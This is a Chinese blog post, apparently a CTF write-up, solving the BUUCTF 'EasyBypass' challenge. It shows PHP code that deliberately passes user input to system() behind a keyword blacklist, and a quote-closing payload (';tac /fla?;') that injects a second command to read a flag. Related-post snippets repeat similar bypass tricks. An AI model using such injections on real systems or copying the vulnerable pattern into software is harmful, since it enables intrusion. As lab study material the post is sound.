EasyBypass (;管道符)

最新推荐文章于 2024-03-08 07:00:00 发布
最新推荐文章于 2024-03-08 07:00:00 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: rce命令执行 文章标签: linux ubuntu git
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/128420988
版权 
<?php

highlight_file(__FILE__);

$comm1 = $_GET['comm1'];
$comm2 = $_GET['comm2'];


if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1))
    $comm1 = "";
if(preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||ls|\||tail|more|cat|string|bin|less||tac|sh|flag|find|grep|echo|w/is", $comm2))
    $comm2 = "";

$flag = "#flag in /flag";

$comm1 = '"' . $comm1 . '"';
$comm2 = '"' . $comm2 . '"';

$cmd = "file $comm1 $comm2";
system($cmd);
?>

这道题第一眼我竟然觉得是原生类的题,该死。

如果是 新生类的话,system那里应该换为 new  a(b)这种的形式,

首先看最后system($cmd)这里,$cmd = "file $comm1 $comm2";,肯定要把file从命令中注释掉这种,以前接触过闭合然后自己重新构造一个🐎,但是这里好像管道符也可以使用 ;

$comm1 = '"' . $comm1 . '"';
$comm2 = '"' . $comm2 . '"';
这个也就是给传入的参数加了一个引号包起来,然后往上继续查看过滤的字符号剩下什么

if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1))
    $comm1 = "";

分号还有,并且tac也没 过滤,flag被过滤掉了但是可以用?模糊比较
if(preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||ls|\||tail|more|cat|string|bin|less||tac|sh|flag|find|grep|echo|w/is", $comm2))
    $comm2 = "";

这个 里面禁用的比较全,就不用这个了

然后我直接传入了

comm1=;tac /fla?&comm2=1
 

 

报错了查看信息是引号的问题,我们还需要闭合掉引号不然就变成了 

"   file " ;tac /fla? ;" "  1"      " 

 肯定是不对的最起码 system({"     ")引号里面是全部的东西不能分着

就需要我们自己写入闭合

comm1= ";tac /fla?;" 

"   file " ";tac /fla?;" " "  1"      " 

这样就成功闭合掉了,然后其实还有一个疑问就是我cat /f*的时候也能用,可是|\*|\

不是被过滤了吗,希望有师傅可以解答一下。

 获得flag

偶尔躲躲乌云334
关注
专栏目录
[BUUCTF]Easybypass
lllffg的博客
04-16 1362
EasyBypass <?php highlight_file(__FILE__); $comm1 = $_GET['comm1']; $comm2 = $_GET['comm2']; if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1)) $
buu-EasyBypass
qaq517384的博客
10-27 633
考点: linux分号执行多条命令 ?正则匹配flag 打开环境 <?php highlight_file(__FILE__); $comm1 = $_GET['comm1']; $comm2 = $_GET['comm2']; if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep
EasyBypass
qq_54929891的博客
06-23 688
哈哈哈
BUUCTF WEB EASY_BYPASS1
qq_41696858的博客
10-17 368
打开场景,直接给了源码,代码审计,没啥好说的,两个get,一个post,很常规的md5数组绕过,post过去的passwd 数字字弱相等 $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) {
[BUUCTF][web][p5]Easybypass
qq_29060627的博客
03-26 4420
<?php highlight_file(__FILE__); $comm1 = $_GET['comm1']; $comm2 = $_GET['comm2']; if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1)) $comm1 = "".
linux管道详解
热门推荐
qq_43382735的博客
10-28 2万+
linux管道 ’ | ’ 操作详解 管道主要用于多重命令处理,前面命令的标准输出作为后面命令的标准输入。简单点说就是,就像工厂的流水线一样,进行完一道工序后,继续传送给下一道工序处理… 举个栗子:对如下文件进行排序去重以后找出包含"better"的行 [root@linuxforliuhj test]# cat hello.sh hello this is linux be better be better i am lhj hello this is linux i am lhj i am
通配管道
Ym0115的博客
03-04 1万+
1、管道 管道号:| 管道的作用:是用于两个命令或者多个命令相链接,将前边的命令的执行结果传递到后边的命令 例如: #查看home目录里的所有的文件 [root@localhost /]# ls -al /home #统计home里一共有多少文件 [root@localhost /]# ls -al /home | wc -l #查看当前系统登录用户的数量 [root@localhost home]# who | wc -l 案例2:结合grep命令使用管道 #
show命令管道深入解析
04-02
### show命令管道深入解析 在IT网络管理与配置领域,`show` 命令是极为常用且重要的工具之一,它能够帮助网络管理员获取路由器、交换机等网络设备的各种状态信息,以便进行故障排查、性能监控等工作。而管道(`...
管道、重定向与环境变量.xmind
08-08
自己做的linux基础相关的知识点的总结,里面有各种博客的链接,细致讲解每一个知识点,适合非计算机专业学习,考研复习,面试前准备等
CMD命令行管道命令使用介绍
09-17
管道“|”在DOS和CMD环境中扮演着关键角色,它使得一系列命令可以串联起来,形成复杂的任务流程。 一、管道命令的基本概念 管道命令的核心在于传递。它通过“|”号将一个命令的输出作为下一个命令的输入,这就...
buuctf EasyBypass --不会编程的崽
最新发布
不会编程的崽的博客
03-08 633
命令执行,闭合问题
BUUCTF--EasyBypass
qq_46263951的博客
08-15 859
题目给出代码 <?php highlight_file(__FILE__); $comm1 = $_GET['comm1']; $comm2 = $_GET['comm2']; if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1))
[MRCTF2020]Ez_bypass 1参考解析
weixin_52003758的博客
01-28 3663
代码审计(md5和php弱类型比较) 查看源代码 【注】添加了部分注释 if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { // 要求$id和$gg的md5不同但是加密结果相同 echo 'You got the first step';
[MRCTF2020]Ez_bypass 1 审计
weixin_45577185的博客
07-20 246
I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { echo
CTFSHOW-命令执行
Monica的博客
09-03 4223
WEB29 题目: <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 分析:题目过滤了flag且忽略大小写 知识点:linux通配 * 匹配任何字串/文本,包括空字串;*代表任意字..
CTFSHOW Web入门 44-52
m0_50936156的博客
01-22 477
目录web 44web 45web 46web 47web 48web 49web 50web 51web 52 web 44 if(!preg_match("/;|cat|flag/i", $c)) {system($c." >/dev/null 2>&1"); 这题过滤了cat,flag 关于cat的过滤绕过可以用以下命令来替换 cat file1 从第一个字节开始正向查看文件的内容 tac file1 从最后一行开始反向查看一个文件的内容 more file1 查看一个长文
正则\绕过
nigo134的博客
07-27 483
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) { echo("forbid ~");.
ctfshow-web入门——命令执行(2)(web41-web57)
m0_62905745的博客
03-16 1134
本篇文章是ctfshow的web入门部分的命令执行部分wp(web41-web 57),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
ctfshow命令执行(web29-web56)第一部分
qq_63928796的博客
10-05 1764
过滤了flag可以用*或者?绕过。
深入理解路由器show命令与管道过滤
"对show命令管道的深入解析,讲解如何使用include、exclude和begin等选项进行数据筛选。" 在网络管理中,`show`命令是路由器和交换机上用于查看设备状态、接口信息、路由表等内容的重要工具。而管道(`|`)的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值